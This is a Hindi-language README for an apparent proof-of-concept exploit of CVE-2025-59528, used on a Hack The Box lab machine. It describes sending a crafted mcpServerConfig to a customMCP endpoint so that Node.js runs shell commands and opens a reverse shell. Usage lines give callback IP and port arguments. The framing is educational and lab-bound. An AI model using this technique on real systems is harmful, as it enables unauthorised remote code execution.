
CVE-2025-59528 के लिए PoC, जिसका उपयोग HTB पर Silentium मशीन पर रिमोट कोड एक्ज़ीक्यूशन प्राप्त करने के लिए किया जाता है।
केवल शैक्षिक उपयोग के लिए। यह परियोजना नियंत्रित सुरक्षा अनुसंधान, कक्षा प्रदर्शन और पृथक प्रयोगशाला में अधिकृत परीक्षण के लिए है। इसका उपयोग उन प्रणालियों, नेटवर्कों, अनुप्रयोगों या खातों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।
यह प्रूफ ऑफ कॉन्सेप्ट प्रदर्शित करता है कि कैसे अनुचित रूप से संभाला गया mcpServerConfig मान सर्वर-साइड JavaScript मूल्यांकन और customMCP नोड-लोड कार्यक्षमता के माध्यम से कमांड निष्पादन की अनुमति दे सकता है।
स्क्रिप्ट दो प्रमाणीकरण विधियों का समर्थन करती है:
Authorization हेडर में एक API कुंजी भेजता है।प्रमाणीकरण के बाद, स्क्रिप्ट /api/v1/node-load-method/customMCP पर एक निर्मित कॉन्फ़िगरेशन सबमिट करती है। पेलोड शेल कमांड निष्पादित करने और शोधकर्ता द्वारा नियंत्रित लिसनर से वापस जुड़ने के लिए Node.js चाइल्ड-प्रोसेस कार्यक्षमता का उपयोग करता है। यह व्यवहार केवल अधिकृत प्रयोगशाला वातावरण में संभावित प्रभाव प्रदर्शित करने के लिए शामिल किया गया है।
requests पैकेज।निर्भरता को इस प्रकार स्थापित करें:
python3 -m pip install requests
स्क्रिप्ट को CVE-2025-59528.py के रूप में सहेजें।
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>
केवल दस्तावेज़ीकरण हेतु मानों के साथ उदाहरण:
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>
केवल दस्तावेज़ीकरण हेतु मानों के साथ उदाहरण:
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444
स्क्रिप्ट इन एप्लिकेशन रूट्स के उपलब्ध होने की अपेक्षा करती है:
/api/v1/auth/login/api/v1/node-load-method/customMCPवर्तमान स्क्रिप्ट http:// URL बनाती है। ऐसी प्रयोगशाला तैनाती का परीक्षण करते समय जिसे TLS की आवश्यकता होती है, HTTPS के लिए कार्यान्वयन अपडेट करें।
main() कमांड-लाइन तर्कों की संख्या को मान्य करता है और प्रमाणीकरण मोड का चयन करता है।login() आपूर्ति किए गए क्रेडेंशियल्स को लॉगिन एंडपॉइंट पर भेजता है।tokens() Set-Cookie प्रतिक्रिया हेडर से सत्र मान निकालता है।shell() प्रमाणित अनुरोध का निर्माण करता है और निर्मित mcpServerConfig मान सबमिट करता है।bearer() सत्र कुकीज़ के बजाय बियरर टोकन का उपयोग करके वही अनुरोध करता है।